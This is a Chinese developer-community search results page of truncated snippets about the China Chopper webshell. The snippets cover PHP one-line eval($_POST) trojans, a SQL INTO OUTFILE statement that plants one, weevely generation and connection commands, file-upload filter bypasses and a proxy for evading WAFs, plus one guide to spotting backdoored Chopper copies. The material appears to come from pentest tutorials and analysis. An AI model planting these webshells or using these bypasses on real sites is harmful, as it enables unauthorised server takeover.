首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

剖析中国 “ 菜刀

本篇以 中国菜刀 (简称:菜刀)进行讲解。 什么是 “ 菜刀菜刀本身最简单的结构就是一个二进制文件。...以php脚本写的网站为例,拿站的一句话木马脚本真的就一句话: (这句木马可能会被微信过滤或者删除,在这里同时写了文本和图片(同一个一句话木马)) 说白了,就是php的可执行函数导致传参被执行,Hacker...直接与网站的系统交互 读明白这句话需要学习PHP语言,给大家解析一下这个一句话 :首先,位于最边界的这个字符串这是php的开头结尾 @:php的抑制报错继续执行的符号。...上传点当然要自己找~~) 2.你将一句话上传后,其url则为(路径+文件名):http://127.0.0.1/q.php 那么,你只需要在菜刀中添加一个记录即可 3.输对地址,简本语言,参数名后直接连接即可...由于被拿服务器的php权限配置不当,我们可任意操控被拿网站的盘符。 菜刀操作很容易上手,在这里,菜刀和一句话木马的基础讲解完毕。

1.4K50
您找到你想要的搜索结果了吗?
是的
没有找到

中国菜刀-分析

类似前言一样得废话 昨天偶然看到了中国菜刀这个词,突然发现这类软件的工作原理倒是没有好好看过,只看过 pwntools的,所以难得有时间,便开着wireshark搞一手,看看发了什么玩意 首先大体分为两种...,一种是读取文件的shell,一种是执行命令的shell 执行命令 菜刀用的方式是这样的 第一个php马->z1[post]->r=z1+z2(拼接语句) ->z2[post]...#z1为/bin/sh #z2为执行所需的命令 在第一个php马中,执行php语句,该Php语句因为过狗的关系,其中所需的值是需要通过二次post来传入的 首先在菜刀中,右键选择虚拟终端...php eval($_POST[-7]);?> 在第一个包中,找到菜刀发送到服务端的包 ?...,而菜刀的做法是,在其中又套了一个一句话木马,参数为 z0 然后它传入了第二个参数,参数为 z0,内容为 @ini_set("display_errors","0");@set_time_limit(0

1.7K10

Metasploit里面也有菜刀~~~

php @eval('$_POST['cmd']');?>' INTO OUTFILE 'C:/AppServ/www/f.php'; 但是我发现一个问题,上传php后缀直接sql报错。...然后想起来今天老师的服务器根目录下面有一个2.php,点开之后啥都没有,我当时推测是一个php木马。然后我用菜刀试了几个我常用的密码,发现都不对。刚刚看到了那个视频讲了一下如何使用msf破解菜刀密码。...然后点开1.php一片空白。...菜刀 菜刀这个东西我以前刚用的时候不知道用法就瞎搞,相信很多新手刚学的时候也有我一样的问题,就是传上去一个木马,比如我在xx.com.cn/xx/yy/upload.php这里上传了一个木马,然后我开菜刀...然后当时也是不懂就瞎搞,菜刀这个东西必须要找到你上传的木马的路径,就是举个例子xx.com.cn/xx/yy/zz/upload/1.php,然后你开菜刀直接把url输入进去,然后输入木马的密码,就可以了

1.8K90

查xise菜刀是否存在后门

本次教程来自YanXia,转载请注明作者信息,博客地址http://www.535yx.cn,感谢 0x00 引言 菜刀简介:菜刀不是用来切菜做饭的道具,而是一款专业的网站管理软件,用途广泛,使用方便,...只要支持动态脚本的网站,都可以用中国菜刀来进行管理。 而现在网络上流传着许多菜刀版本,这些菜刀中十有八九都存在着他人的后门,这些后门的投放者则利用这些后门获取源源不断的shell用来做违法的事儿。...应老表们的要求,今天给大家带来一篇简单的查菜刀是否存在后门的教程(本文章仅教授诸位如何查找菜刀后门。...请各位不要看了本文后,反而去做一些坏事) 0x01 工具准备 一个xise菜刀(这个是存在后门的),一个c32acm 链接:https://pan.baidu.com/s/1Q-VmVGZfaAnkJxEqlY0Bbg

42720

CaidaoMitmProxy:基于HTTP代理中转菜刀过WAF

基于HTTP代理中转菜刀过WAF 前言 在实际的渗透过程中,我们常常因为WAF而头疼。源码免杀了而传输层却被拦截了实在难受。虽然现在很多优秀的应用。如蚁剑,C刀,冰蝎等。...思路 如果我们要实现类似冰蝎那种数据加密传输必定要拦截菜刀的发送数据。如何拦截呢?这里就可以想到中间人劫持了。利用中间人拦截了菜刀的传输数据然后进行自定义加密再发送给webshell。这不就成功了吗?...分割线上是菜刀正常的传输,下面是我们要实现的加密传输。在加密算法的选择上我选择了DES算法。 原因如下: 1. PHP 本版兼容性最高,代码量少且简单,不依赖openssl 2....在其他脚本中也是相对较少的代码量和较好的兼容性 实现 基于菜刀20160622版本修改和测试。 利用MitmProxy作为中间人代理,只需要写个插件即可实现。...默认监听是8080 用菜刀直接连接就能开始食用啦 ? Webshell和插件还有其他详情在github。

1.4K10

kali下的中国菜刀

weevely 是kali中的php webshell 工具。但相较于 webacoo ,weevely 的功能更加强大,同时对于webshell的连接设立了密码选项!...准备环境: kali linux Metasploitables2 首先还是先制作一个 webshell ,密码为 bbskali weevely generate bbskali secist.php...我们使用 cat 命令简单查看下 webshell 的内容: cat /usr/share/weevely/secist.php 现在我将生成的 webshell 远程拷贝到目标机器上: scp /usr.../share/weevely/secist.php msfadmin@192.168.30.128:/home/msfadmin 或者上传PHP木马 连接一句话木马 weevely http://192.168.30.128.../secist.php secist image.png 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/87.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可

63920

跨平台版中国菜刀Cknife发布

一直都有想写一款真正实用的跨平台类似的菜刀,然后可惜代码是个渣渣一直可望而不可即,后续随着公司业务增多,大多数目标都有WAF,于是就想写一款完全脱离工具,只依靠配置文件的菜刀。...前面说过这是一款完全基于配置文件的菜刀,主程序只是图形的展示,以及数据的发送,我分开了每一个步骤写入到配置文件里面。可以自定义任何代码,包括更改参数名称,参数内容。...当你只用MAKE的时候确实想不到办法去过WAF的时候, 你可以写一个脚本比如PHP的,但是不是一句话,而是实现正常功能的脚本。...比如这个脚本为1.php,我写一个功能为显示主页的功能,然后提交1.php?action=index, 选择自定义对接,就可以与C刀进行连接了。前提是你的1.php得过WAF。...下载地址 请通过阅读原文获取下载地址 补充下关于JSP脚本,修复了原版本菜刀JSP上传失败的问题。 帮老大打个广告团队各种需求二进制大咖,安卓大咖,IOS大咖,小菜我也好抱抱大腿。

2.6K70

一句话木马与中国菜刀

一句话木马就是一句简单的脚本语言,常见脚本语言的一句话木马如下 php:  这里没有放jsp的一句话木马,因为jsp的一句话比较复杂,想看的可以看这篇文章 一句话木马的使用  以php...一句话为例,我们可以直接将这些语句插入到网站的某个php文件上,或者直接创建一个新的文件,在文件里写入一句话木马,然后把文件上传到网站上即可。...我们把这个phpma.php上传上去后,打开中国菜刀,在空白处鼠标右键,选择“添加选项” ?  编辑相关参数,包括一句话木马所在的URL以及密码,最后点击“编辑” ?  ...然后输入DOS命令:copy 1.jpg+1.php 2.jpg ?  此时产生的2.jpg就是我们要的图片一句话木马 总结  其他类型的一句话木马也是一样的使用方法。

8.9K10

CaidaoMitmProxy:基于HTTP代理中转菜刀过WAF

基于HTTP代理中转菜刀过WAF 前言 在实际的渗透过程中,我们常常因为WAF而头疼。源码免杀了而传输层却被拦截了实在难受。虽然现在很多优秀的应用。如蚁剑,C刀,冰蝎等。...思路 如果我们要实现类似冰蝎那种数据加密传输必定要拦截菜刀的发送数据。如何拦截呢?这里就可以想到中间人劫持了。利用中间人拦截了菜刀的传输数据然后进行自定义加密再发送给WebShell。这不就成功了吗?...类似下图 分割线上是菜刀正常的传输,下面是我们要实现的加密传输。在加密算法的选择上我选择了DES算法。 原因如下: 1. PHP 本版兼容性最高,代码量少且简单,不依赖openssl 2....在其他脚本中也是相对较少的代码量和较好的兼容性 实现 基于菜刀20160622版本修改和测试。 利用MitmProxy作为中间人代理,只需要写个插件即可实现。...默认监听是8080 用菜刀直接连接就能开始食用啦 Webshell和插件还有其他详情在Github。

67710

文件上传漏洞超级大汇总-第一篇

例子:Apache扩展名解析漏洞 打开站点,将x.php后缀名修改为x.php.7z,上传x.php.7z, 上传成功,上传成功后使用中国菜刀进行连接 3、PHP CGI解析漏洞 Nginx上的漏洞 例子...=”.php” ),forward l 上传yijuhua.php,上传成功 l 用中国菜刀连接yijuhua.php,查看实验现象 5、绕过MIME文件类型检测 打开站点,打开burpsuit,开启服务器代理...,上传,上传成功后使用中国菜刀进行连接 8、黑名单绕过 例子:IIS黑名单绕过 l 将yijuhua.php后缀名改为yijuhua.PHP(文件重命名就可以),上传到站点,上传成功,用中国菜刀连接yijuhua.PHP...l 将xx.asa上传至站点,上传成功,打开xx.asa所在链接写入一句话木马,用中国菜刀进行连接 例子:Apache黑名单绕过 l 将dama.php后缀名改为dama.phP,上传到站点,上传成功后访问木马所在的链接或使用中国菜刀进行连接...l 上传yijuhua.php时使用burpSuite进行抓包,将yijuhua.php后缀名后面加上空格,或者改成php3、上传到站点,上传成功,使用中国菜刀进行连接 9、白名单绕过 例子:截断目录路径

2.2K71
领券